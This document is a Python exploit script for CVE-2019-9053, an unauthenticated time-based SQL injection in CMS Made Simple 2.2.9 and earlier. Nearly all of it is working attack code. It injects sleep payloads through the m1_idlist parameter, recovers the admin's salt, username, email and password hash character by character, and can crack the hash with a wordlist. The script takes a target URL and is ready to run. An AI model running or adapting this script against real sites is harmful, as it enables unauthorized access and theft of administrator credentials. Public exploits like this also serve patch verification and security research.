#!/usr/bin/env python3 # Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 # Date: 30-03-2019 # Exploit Author: Daniele Scanu @ Certimeter Group # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ # Version: <= 2.2.9 # Tested on: Ubuntu 18.04 LTS # CVE : CVE-2019-9053 import requests from termcolor import colored import time from termcolor import cprint import optparse import hashlib parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.x.x/cms)") parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password") parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False) options, args = parser.parse_args() if not options.url: print("[+] Specify a target URL") print("[+] Example usage (no password cracking): exploit.py -u http://target-uri") print("[+] Example usage (with password cracking): exploit.py -u http://target-uri --crack -w /path-to-wordlist") print("[+] Set the variable TIME with an appropriate time value because this SQL injection is time-based.") exit() url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' session = requests.Session() dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' flag = True password = "" temp_password = "" TIME = 3 # Increase time for better consistency db_name = "" output = "" email = "" salt = '' wordlist = "" if options.wordlist: wordlist += options.wordlist def crack_password(): global password global output global wordlist global salt with open(wordlist, 'r', encoding='latin-1', errors='ignore') as dict: for line in dict: line = line.strip() beautify_print_try(line) if hashlib.md5((salt + line).encode('utf-8')).hexdigest() == password: output += "\n[+] Password cracked: " + line break def beautify_print_try(value): global output print("\033c", end='') cprint(output, 'green', attrs=['bold']) cprint('[*] Try: ' + value, 'red', attrs=['bold']) def beautify_print(): global output print("\033c", end='') cprint(output, 'green', attrs=['bold']) def get_response(url): retries = 3 for _ in range(retries): try: r = session.get(url, timeout=TIME+2) return r except requests.exceptions.Timeout: print("Request timed out. Retrying...") time.sleep(2) return None def dump_salt(): global flag global salt global output ord_salt = "" ord_salt_temp = "" while flag: flag = False for i in range(len(dictionary)): temp_salt = salt + dictionary[i] ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] beautify_print_try(temp_salt) payload = f"a,b,1,5))+and+(select+sleep({TIME})+from+cms_siteprefs+where+sitepref_value+like+0x{ord_salt_temp}25+and+sitepref_name+like+0x736974656d61736b)+--+" url = url_vuln + "&m1_idlist=" + payload start_time = time.time() r = get_response(url) if r is None: continue elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: salt = temp_salt ord_salt = ord_salt_temp flag = True output += '\n[+] Salt for password found: ' + salt def dump_password(): global flag global password global output ord_password = "" ord_password_temp = "" while flag: flag = False for i in range(len(dictionary)): temp_password = password + dictionary[i] ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:] beautify_print_try(temp_password) payload = f"a,b,1,5))+and+(select+sleep({TIME})+from+cms_users+where+password+like+0x{ord_password_temp}25+and+user_id+like+0x31)+--+" url = url_vuln + "&m1_idlist=" + payload start_time = time.time() r = get_response(url) if r is None: continue elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: password = temp_password ord_password = ord_password_temp flag = True output += '\n[+] Password found: ' + password def dump_username(): global flag global db_name global output ord_db_name = "" ord_db_name_temp = "" while flag: flag = False for i in range(len(dictionary)): temp_db_name = db_name + dictionary[i] ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] beautify_print_try(temp_db_name) payload = f"a,b,1,5))+and+(select+sleep({TIME})+from+cms_users+where+username+like+0x{ord_db_name_temp}25+and+user_id+like+0x31)+--+" url = url_vuln + "&m1_idlist=" + payload start_time = time.time() r = get_response(url) if r is None: continue elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: db_name = temp_db_name ord_db_name = ord_db_name_temp output += '\n[+] Username found: ' + db_name flag = True def dump_email(): global flag global email global output ord_email = "" ord_email_temp = "" while flag: flag = False for i in range(len(dictionary)): temp_email = email + dictionary[i] ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] beautify_print_try(temp_email) payload = f"a,b,1,5))+and+(select+sleep({TIME})+from+cms_users+where+email+like+0x{ord_email_temp}25+and+user_id+like+0x31)+--+" url = url_vuln + "&m1_idlist=" + payload start_time = time.time() r = get_response(url) if r is None: continue elapsed_time = time.time() - start_time if elapsed_time >= TIME: flag = True break if flag: email = temp_email ord_email = ord_email_temp output += '\n[+] Email found: ' + email flag = True dump_salt() dump_username() dump_email() dump_password() if options.cracking: print(colored("[*] Now trying to crack the password", 'yellow')) crack_password() beautify_print()